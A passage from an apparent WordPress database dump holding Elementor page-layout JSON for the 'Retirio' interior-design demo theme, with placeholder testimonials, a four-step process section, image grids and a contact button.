solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3214,4766,'_elementor_page_assets','a:1:{s:6:\"styles\";a:16:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";i:15;s:12:\"e-animations\";}}'),(3215,4766,'_elementor_pro_version','3.8.1'),(3216,4646,'_elementor_css','a:6:{s:4:\"time\";i:1685010730;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3217,613,'_elementor_css','a:6:{s:4:\"time\";i:1685010804;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3218,619,'_elementor_css','a:6:{s:4:\"time\";i:1685010805;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3219,624,'_elementor_css','a:6:{s:4:\"time\";i:1685010805;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3220,629,'_elementor_css','a:6:{s:4:\"time\";i:1685010806;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3221,4767,'_wp_page_template','elementor_header_footer'),(3222,4767,'_elementor_edit_mode','builder'),(3223,4767,'_elementor_template_type','wp-page'),(3224,4767,'_elementor_version','3.8.1'),(3225,4767,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_hei